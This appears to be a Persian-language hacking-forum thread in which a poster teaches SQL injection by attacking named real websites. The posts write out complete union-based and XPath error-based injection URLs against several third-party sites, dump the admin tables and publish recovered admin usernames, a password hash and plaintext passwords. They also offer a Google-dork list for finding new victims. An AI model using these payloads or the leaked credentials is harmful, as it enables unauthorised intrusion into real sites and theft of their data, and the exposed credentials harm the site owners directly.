discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.••

با سلام خدمت کاربران محترم انجمن گاردایران

تارگت اول برای آموزش ->

شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا  \  

بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده

برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم

DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید

باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول

http://musculoskeletalsociety.in/page.php?id=5 

شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید

http://musculoskeletalsociety.in/page.php?id=5 order by 99999-- 

99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند 😁 پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش

http://musculoskeletalsociety.in/page.php?id=-5 order by 99999--+

در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است

http://musculoskeletalsociety.in/page.php?id=-5 order by 5--+

حال با دستور  UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم

http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,3,4,5--+

بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند

برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@

http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,version(),4,5--+

حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور

http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+

اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون

CharConversion.rarپسورد ---> guardiran.org

 

admin = 0x61646d696e  اینو یادتون باشه حتما قبل 61646d696e  ---> 0x قرار دهید

دستور بدین صورت است

http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+

بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید

group_concat(user,0x3a,password)+from+  Hex kardim 
http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+

به همین راحتی 

username : admin

password : 25a41cec631264f04815eda23dc6edd9

password : vizag@123

سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو

نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید

(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)

به همین راحتی تمام جزئیات مشخص خواهد شد

تارگت شماره ی 2 ---------->

http://www.belbana.com

شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید

site:"http://www.belbana.com" inurl:"id="
http://www.belbana.com/our-products-detail.php?id=1

فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد

حال دستورات را وارد میکنیم

http://www.belbana.com/our-products-detail.php?id=1 order by 999999--

بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم

http://www.belbana.com/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7--

ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد

The used SELECT statements have a different number of columns

زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید

متد xpath injection

برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور

+and+extractvalue(rand(),concat(0x7e,version()))--
or
+and+updatexml(null,concat(0x3a,version()),null)-- 

بعد از وارد کردن

http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))--

version مشخص میشود

XPATH syntax error: '~5.5.62-38.14-log'

به همین راحتی

حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش

+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))--

که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش

+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

حال دستورات را وارد کنید بدین طریق

http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید

admin = 0x61646d696e

+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))--

بسیار خب حالا دستور بالا را وارد میکنیم

www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))--

بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که

XPATH syntax error: '~id'
XPATH syntax error: '~login'
XPATH syntax error: '~paswoord'

نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود

حالا با دستور زیاد اطلاعات رو بیرون میکشیم

+and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))--
XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng'

سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص

امیدوارم موفید واقع شده باشه

با تشکر

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.••

با سلام خدمت کاربران محترم انجمن گاردایران

در این تاپیک میریم سر وقت تارگت بعدی با نکته ی خاص برای عزیزانی که علاقه مند هستند به زمینه ی هک سایت سعی میکنم هر روز یک تارگت برای آموزشتون قرار بدم

نکته : سعی کنید در این تاپیکی که قرار دادم اسپم نکنید و شما با پسندیدن تاپیک بنده رو در ادامه دادن آموزش Sqlinjection تشویق میکنید

بسیار خب تارگت بعدی برای آموزش

http://www.multitrack.co.th/product.php?id=5'

طبق آموزشی که بهتون دادم شما با قرار دادن ' متوجه حضور باگ در سایت میشید

حال شروع میکنیم به وارد کردن دستورات

http://www.multitrack.co.th/product.php?id=5 order by 99999--

تعداد رو مرتب کم میکنیم تا صفحه load شود 🙌

http://www.multitrack.co.th/product.php?id=5 union select 1,2,3,4--

بعله میبینید که اینجا هر چقدر هم بایپس کنید در صفحه ستونی برای نمایش نمیبینید پس باید چکار کرد ؟؟؟؟؟؟؟؟؟؟

بسیار خب فیلم آموزشی رو قرار میدم

میبینید که گاهی اوقات باید وارد source صفحه بشید و سایت رو بررسی کنید از نظر ستون آسیب پذیر 👽

 

 

تخصص بنده در زمینه :

 

𝐒𝐪𝐥𝐢𝐧𝐣𝐞𝐜𝐭𝐢𝐨𝐧

𝑨𝒖𝒕𝒐𝒊𝒕

𝓒++

C#

𝐊𝐚𝐥𝐢 𝐋𝐢𝐧𝐮𝐱

Geant4

𝑽𝒊𝒓𝒖𝒔 𝒑𝒓𝒐𝒈𝒓𝒂𝒎𝒊𝒏𝒈

𝐫𝐚𝐧𝐬𝐨𝐦𝐰𝐚𝐫𝐞

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری